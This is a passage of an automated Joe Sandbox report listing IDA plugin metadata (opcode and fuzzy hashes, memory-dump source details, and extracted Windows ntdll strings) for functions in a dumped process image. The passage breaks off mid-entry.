                                                                    • API String ID: 0-205724851
                                                                    • Opcode ID: 1c0bb81f902085b72afe77add7cdeb436cd043d75af2217bedee79ce609f25a8
                                                                    • Instruction ID: 37a528dc2608b762b06f3b3605c6a568acf578476142588dee17bf3ec70cd6a1
                                                                    • Opcode Fuzzy Hash: 1c0bb81f902085b72afe77add7cdeb436cd043d75af2217bedee79ce609f25a8
                                                                    • Instruction Fuzzy Hash: 9171E976D0020DBFDB15CB94C881FEEBBB9FB18350F104569AA14A7290E774AA46CBD4
                                                                    Strings
                                                                    • LdrpResGetMappingSize Enter, xrefs: 28FDAC6A
                                                                    • LdrpResGetMappingSize Exit, xrefs: 28FDAC7C
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                    • API String ID: 0-1497657909
                                                                    • Opcode ID: 0ae165c3e8205c2cd78669cd170472f842b690bca540a255b7abdc95284ab923
                                                                    • Instruction ID: 5be05343bac285e5b2e1b5166eaf0df03ac0ad5b087ee866f45a7e9f8fdce2ce
                                                                    • Opcode Fuzzy Hash: 0ae165c3e8205c2cd78669cd170472f842b690bca540a255b7abdc95284ab923
                                                                    • Instruction Fuzzy Hash: 6861D072A02749DFDB05CFA9C880B8DB7B6BF48751F48496AEA00EB290D774D951C728
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$MUI
                                                                    • API String ID: 0-17815947
                                                                    • Opcode ID: cd0c409c23233314d5a9e1ec6c09476c91ec9b4f29f472272bee7e10684ffe01
                                                                    • Instruction ID: d9d4b6cb24bafcec99203079507b26d2e43c9aa7003acb414d580a16e7da74b9
                                                                    • Opcode Fuzzy Hash: cd0c409c23233314d5a9e1ec6c09476c91ec9b4f29f472272bee7e10684ffe01
                                                                    • Instruction Fuzzy Hash: 50513A71D0021DAEDB01CFA5CC80AEEBBBDEF08754F104929E615B7290D6319906CB64
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0$Flst
                                                                    • API String ID: 0-758220159
                                                                    • Opcode ID: 05839a8c4fa241019e6e1b3072a1017ec10355856bf44d8b85740c962005557d
                                                                    • Instruction ID: 66aedfeb96f1ddfbc7a5a998b055a649ff968b32fab4504febbca738fedb00f1
                                                                    • Opcode Fuzzy Hash: 05839a8c4fa241019e6e1b3072a1017ec10355856bf44d8b85740c962005557d
                                                                    • Instruction Fuzzy Hash: EF5189B1E0064C8BEB18CF98D595B59FBF4EF44754F14887BD0099B251EB70EA82CB88
                                                                    Strings
                                                                    • RtlpInsertAssemblyStorageMapEntry, xrefs: 29042807
                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 2904280C
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                    • API String ID: 0-2104531740
                                                                    • Opcode ID: 587c898a8efd70893d0830f9745556485fbf21e9d288dd7984c8588eed7cd24e
                                                                    • Instruction ID: 7b8a5b0515c01b12502c5d933f4629267b244c8c895e9fe1083c121f0104232b
                                                                    • Opcode Fuzzy Hash: 587c898a8efd70893d0830f9745556485fbf21e9d288dd7984c8588eed7cd24e
                                                                    • Instruction Fuzzy Hash: 9841C035A01219EBD718CF59C840E6AB7E6FF98B50F11887DE9489B640E730DD92CBA0
                                                                    Strings
                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 28FDA309
                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 28FDA2FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                    • API String ID: 0-2876891731
                                                                    • Opcode ID: 0ba4c6ea58bcec1e684cfc379a638a3534a884a03fbe3603e1f8307f95362ece
                                                                    • Instruction ID: 909a7a8fd225e33577294fbf376573aef7a40c72f68237ad184fbda018d78704
                                                                    • Opcode Fuzzy Hash: 0ba4c6ea58bcec1e684cfc379a638a3534a884a03fbe3603e1f8307f95362ece
                                                                    • Instruction Fuzzy Hash: 4141BC76A02789DBDB05CF59C840B5A77B7FF89300F2844A9EA04DB291E336CA41CB58
                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 29011025
                                                                    • @, xrefs: 29011050
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                    • API String ID: 0-2976085014
                                                                    • Opcode ID: 882b827c36983a5f44211e833a1b22a3e48184120a61a4d327b76e0c978db017
                                                                    • Instruction ID: 9710395b76b7acc45117f1ba3a46d50ecd18f13416c1bcd8e31174bb2d0ef0f2
                                                                    • Opcode Fuzzy Hash: 882b827c36983a5f44211e833a1b22a3e48184120a61a4d327b76e0c978db017
                                                                    • Instruction Fuzzy Hash: 93318F7290158CBBCB16DF95C884E9FBBBDEB94750F014965F500A7260D775DD02CBA0
                                                                    Strings
                                                                    • B5%r(, xrefs: 2906AF47, 2906AF6E
                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 2906AF2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B5%r($NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                    • API String ID: 0-671076713
                                                                    • Opcode ID: ac7a7e526c5eb35afcc9a1945d0afccd6b8ae6de7e5953a1a580594c37c8545a
                                                                    • Instruction ID: f2393b5a54a2f5ec198348d7fc968cf643ef0808359db2546b6803fbcac8e651
                                                                    • Opcode Fuzzy Hash: ac7a7e526c5eb35afcc9a1945d0afccd6b8ae6de7e5953a1a580594c37c8545a
                                                                    • Instruction Fuzzy Hash: 8C3126B2A0064CAFC700EF99CD44F5ABBF5FB48710F108965FA05A7650C738A942CBA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PATH
                                                                    • API String ID: 0-1036084923
                                                                    • Opcode ID: 1f5c850d66f8cb242e046279f28c1cc55ac8c01f78d27d7f20cbde41ab2e5f37
                                                                    • Instruction ID: dc8615f44946b8181e392d04c37ad8479e25aa598c9506b4f1d87649a8747c89
                                                                    • Opcode Fuzzy Hash: 1f5c850d66f8cb242e046279f28c1cc55ac8c01f78d27d7f20cbde41ab2e5f37
                                                                    • Instruction Fuzzy Hash: 4FF1B0B2D01259EBCB15CF98D880AAEB7F6FF48700F5D4029EB44AB350E7349951CBA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: w
                                                                    • API String ID: 0-476252946
                                                                    • Opcode ID: 56391b22438d518148d0e76e749d4e186020b0884b48544dcbb806850cc612ba
                                                                    • Instruction ID: 2056627dc1a73dc24a57ea7d81a84d8a420b8afb4e8b244b28ace3994782f682
                                                                    • Opcode Fuzzy Hash: 56391b22438d518148d0e76e749d4e186020b0884b48544dcbb806850cc612ba
                                                                    • Instruction Fuzzy Hash: A0D19070900229EBDB18CF55C842ABEBBF1FF44704F14C86AE99997251E335EA93D790
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                    • Instruction ID: 506756b199ea74c6c474ba8a53bb6a7e22bb7a80d39f7ab7e171aeaa1df8cde0
                                                                    • Opcode Fuzzy Hash: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                    • Instruction Fuzzy Hash: 81A12C75E0130DEFDB05CF98C880AEEB7FAEF18750F144829EA19A7251E7749942CB54
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2+)
                                                                    • API String ID: 0-4146280145
                                                                    • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                    • Instruction ID: 909f2279614f9bcc3a7b469e4c30d41c8ff1aaeb24a46047ee1d9d21d2d1d2d3
                                                                    • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                    • Instruction Fuzzy Hash: 64B11871E0061ADFDB18CFADC880A9DB7F5BF48350F24857AEA14AB355D730A942CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 886a84a3437624daa4cb774f6ac5c6cf3fbeb4a16389e6f0ed6618716f5c91e7
                                                                    • Instruction ID: 42404908bc1abc89a70bc4890fc7a19dfcd536dae60d64f4257a1bba47394490
                                                                    • Opcode Fuzzy Hash: 886a84a3437624daa4cb774f6ac5c6cf3fbeb4a16389e6f0ed6618716f5c91e7
                                                                    • Instruction Fuzzy Hash: 4891B17190264CBADB169FA0DC44FDFBBBAEF55760F100825F504AB260EB359903CBA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B5%r(
                                                                    • API String ID: 0-903791394
                                                                    • Opcode ID: e1803e1a4a0232130f74c14ae9a83781d99a309db5dfa9f34a2811c85f24c209
                                                                    • Instruction ID: 8a840e0b81e0b7b7f482c92d43eadb68695e8258d19d8f70c9150f74066abf29
                                                                    • Opcode Fuzzy Hash: e1803e1a4a0232130f74c14ae9a83781d99a309db5dfa9f34a2811c85f24c209
                                                                    • Instruction Fuzzy Hash: 6F61D171E00249DFEB08DF68C891AAEB7F5BF08350F10997AEA15EB291D7709902CB54
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .mui
                                                                    • API String ID: 0-1199573805
                                                                    • Opcode ID: c4d40e592bdee03b3bc561b5e05cdb812f8a2a9b8887793896bd4c25c60957be
                                                                    • Instruction ID: 2e0c8ba4b957ee30fc177fe9fed15ffd1ef220284eb56c40dc0f8102e9a0ceee
                                                                    • Opcode Fuzzy Hash: c4d40e592bdee03b3bc561b5e05cdb812f8a2a9b8887793896bd4c25c60957be
                                                                    • Instruction Fuzzy Hash: FA517672D0132DABCB04CF99D880EEEB7B6EF14760F054569E915B7250E7349D02CBA8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AlternateCodePage
                                                                    • API String ID: 0-3889302423
                                                                    • Opcode ID: a60b9d8b7ff8844380ac920d11caf27548a1fe1638713006beb25d7a50e237a0
                                                                    • Instruction ID: ae48d68f72d6529c3ec7e61c15ab2fe604fb469b8fb5d2f37fbff30a58402984
                                                                    • Opcode Fuzzy Hash: a60b9d8b7ff8844380ac920d11caf27548a1fe1638713006beb25d7a50e237a0
                                                                    • Instruction Fuzzy Hash: 3941E176D01619AAEF18CF99C880AEFB7F9FF85310F10456AE515E7290EB349B42CB50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TrustedInstaller
                                                                    • API String ID: 0-565535830
                                                                    • Opcode ID: c4ee5bd1d4528a7333c1547e8068564cad08106c0b48b091b1b88a0e97d794bd
                                                                    • Instruction ID: 2d7c802eceedad1ac783ec3b6a23225c8078c4fb86098a15b20e0422c1d526a2
                                                                    • Opcode Fuzzy Hash: c4ee5bd1d4528a7333c1547e8068564cad08106c0b48b091b1b88a0e97d794bd
                                                                    • Instruction Fuzzy Hash: 13319E76941629BADB16DB94CC41FEEBBB9EF54740F010476FA00AB160E6319E42CBA0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #
                                                                    • API String ID: 0-1885708031
                                                                    • Opcode ID: 24578117c17ab4bd31016e7a674aa69052c4abe308eb44bd12098ac8d0594eb4
                                                                    • Instruction ID: ed02876e3c203ddd6602ca918fa1d70d4e7d7190281b8f7cb524059a19ddfaf4
                                                                    • Opcode Fuzzy Hash: 24578117c17ab4bd31016e7a674aa69052c4abe308eb44bd12098ac8d0594eb4
                                                                    • Instruction Fuzzy Hash: E9314831600B0C9BD726CFA5C850BEE77F8DF44314F104479E945AB2A2DB76E906CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                    • Instruction ID: 813a100c3f481b46f4a495c1ad1adcd61fee96c19b322426a9ef2e73cab83a6c
                                                                    • Opcode Fuzzy Hash: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                    • Instruction Fuzzy Hash: D1314B71118389AFD355CF14C849E9BBBF8EF94760F404E2EB59487190E7B0D909CB96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    • Opcode ID: e8dfc881d3cc12fbcd16583b240a6526d1f71887e6e05bb35b85a8a984c689c5
                                                                    • Instruction ID: 4bbafdc99396d0214768ab47531e339e42dd8f5ac63c3389abd56c6183e8e2ad
                                                                    • Opcode Fuzzy Hash: e8dfc881d3cc12fbcd16583b240a6526d1f71887e6e05bb35b85a8a984c689c5
                                                                    • Instruction Fuzzy Hash: 1631F136D01529AFDB09CA59C845EAFB7B6EF80760F018979A914A7251D7309E02CBE0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: WindowsExcludedProcs
                                                                    • API String ID: 0-3583428290
                                                                    • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                    • Instruction ID: db768cb303bef29faa903beae6e06c23747f0ac0aaf32f6d659a38f097a52b86
                                                                    • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                    • Instruction Fuzzy Hash: 2A213437612118BBCB128A58C884F4F77BEAF71AA0F254476BA089F564C630CD0287A0
                                                                    Strings
                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 2905895E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                    • API String ID: 0-702105204
                                                                    • Opcode ID: 9195c8406c5dbe75beb138c4aec59b3138afd1bd0a376d4a81feadd124000b0c
                                                                    • Instruction ID: 330a050ed6b2e1134829d028f9acf500c427c46bd94d74d7231a0bb8682e333d
                                                                    • Opcode Fuzzy Hash: 9195c8406c5dbe75beb138c4aec59b3138afd1bd0a376d4a81feadd124000b0c
                                                                    • Instruction Fuzzy Hash: 3401A73A20525CAFD71C5B51DCC4F6E77E5FF96290B481C28EF4217559CB206C43C69A
                                                                    Strings
                                                                    • Critical error detected %lx, xrefs: 29087027
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Critical error detected %lx
                                                                    • API String ID: 0-802127002
                                                                    • Opcode ID: 62712123fc2b006b53b3b7779353b5e86ca7f17872f5ce5d0be363e33de0df15
                                                                    • Instruction ID: dbf6f15d71ecd59e25fa0cf3196794e38b93a97dfcabc8c6a38d9cf564e511d1
                                                                    • Opcode Fuzzy Hash: 62712123fc2b006b53b3b7779353b5e86ca7f17872f5ce5d0be363e33de0df15
                                                                    • Instruction Fuzzy Hash: A7112776E1434CDADB25CFA4D941B9DBBB1FB04318F20892AD155AB282D7756602CF14
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2a361f97b7b321a42f401702266d4a1bef1f156bc0ef734a93c9fe3ca8d2319d
                                                                    • Instruction ID: ea035c6108b3e35754eab719b57ba2f7b330e135debe4a17c34a4cb9ab4379e1
                                                                    • Opcode Fuzzy Hash: 2a361f97b7b321a42f401702266d4a1bef1f156bc0ef734a93c9fe3ca8d2319d
                                                                    • Instruction Fuzzy Hash: 1542CC326093499BD719CF68C880AABB7F5BF9C360F044D3EFA8587260D631D946CB56
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d4165a3ecd5f21a96eec7d59d8e7d5a7912cf1d6519cca48d14adf527759b6fe
                                                                    • Instruction ID: b1bb36914abfafb370144db58c2d8b15548aee911069065bde8aae78a6dd7211
                                                                    • Opcode Fuzzy Hash: d4165a3ecd5f21a96eec7d59d8e7d5a7912cf1d6519cca48d14adf527759b6fe
                                                                    • Instruction Fuzzy Hash: FC426F75E102199FDB28CF69C881BADB7F6BF48300F1484AAE949EB251E7349D81CF54
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 718c16a73ccd6df6e525b75f9369bbd6c656764337d904a692b77736400236a6
                                                                    • Instruction ID: b52386e844ead609a54ebacb1f7f1494eece41a7b507c51c9f2a3df7c93c2696
                                                                    • Opcode Fuzzy Hash: 718c16a73ccd6df6e525b75f9369bbd6c656764337d904a692b77736400236a6
                                                                    • Instruction Fuzzy Hash: 39322570A0075D9FDB18CFA5C845BAEB7F2BF84744F608A2EE4499B280D735A943CB54
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c8471e72a80eb61f7a7d9dc446c24e22a932349100f333d6b631e11d6540ff4
                                                                    • Instruction ID: 2153b057018b5fffd563500dd43d38d27858b6e60c49c26cfc679a059d666d23
                                                                    • Opcode Fuzzy Hash: 0c8471e72a80eb61f7a7d9dc446c24e22a932349100f333d6b631e11d6540ff4
                                                                    • Instruction Fuzzy Hash: C922C1706047599FD718CF2AC8907B6B7F1AF44360F048C6AE9868F286D335E593DB68
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c5bdeb481894f69b968f94e5f39bc88fed56373fda8f9c5e00a0520b9c29722b
                                                                    • Instruction ID: 70b14b44723731d747fe53ae1dfa26c44dcec300a468c6ae817d9312eadcfda6
                                                                    • Opcode Fuzzy Hash: c5bdeb481894f69b968f94e5f39bc88fed56373fda8f9c5e00a0520b9c29722b
                                                                    • Instruction Fuzzy Hash: A3225170E0111ADFCB08CF95C4809BEFBF2BF58704B64846AE9459B291E734DE42DB64
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c9cdccbee268412ac353131b164a2a03f773d7e0120b47973993c54d51193e6
                                                                    • Instruction ID: d3143489c70fadfade99267298e3114eff56b3829d2bf8278fd285b2fb26a4e3
                                                                    • Opcode Fuzzy Hash: 9c9cdccbee268412ac353131b164a2a03f773d7e0120b47973993c54d51193e6
                                                                    • Instruction Fuzzy Hash: 0B327E76A05209DFCB54CF68C480B9EB7F2FF48310F14896AEA55AB352D734E942CB94
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                    • Instruction ID: e004e6f9cf4fd9838346ab9106a58747c12127b669e9dfd1696ea610195b9007
                                                                    • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                    • Instruction Fuzzy Hash: F6F18E71E022099BDB18CF95C580BAEB7F6BF68714F048579E904EB3A1E774D942CB60
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8912978d85487bb4b66011a3e44eb8897c8f0771318dc605ff915184e53de34d
                                                                    • Instruction ID: e8093e42acbf4520e639b843a67c06af01e66d2706e6833ed86cbb4de9ae3321
                                                                    • Opcode Fuzzy Hash: 8912978d85487bb4b66011a3e44eb8897c8f0771318dc605ff915184e53de34d
                                                                    • Instruction Fuzzy Hash: D7D10471A0060D9BDB08CF58C841AEEB7F2AF88354F18896ADD55E7251E735EA02CF64
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bd29429688b6ef2761a31bed68d3bc2a997f3ce0f3d5170324da097430337867
                                                                    • Instruction ID: 53aa23c21bad3b89347ed20c6e4ac21d8dc8ce1b3d114a29f443994f61db149f
                                                                    • Opcode Fuzzy Hash: bd29429688b6ef2761a31bed68d3bc2a997f3ce0f3d5170324da097430337867
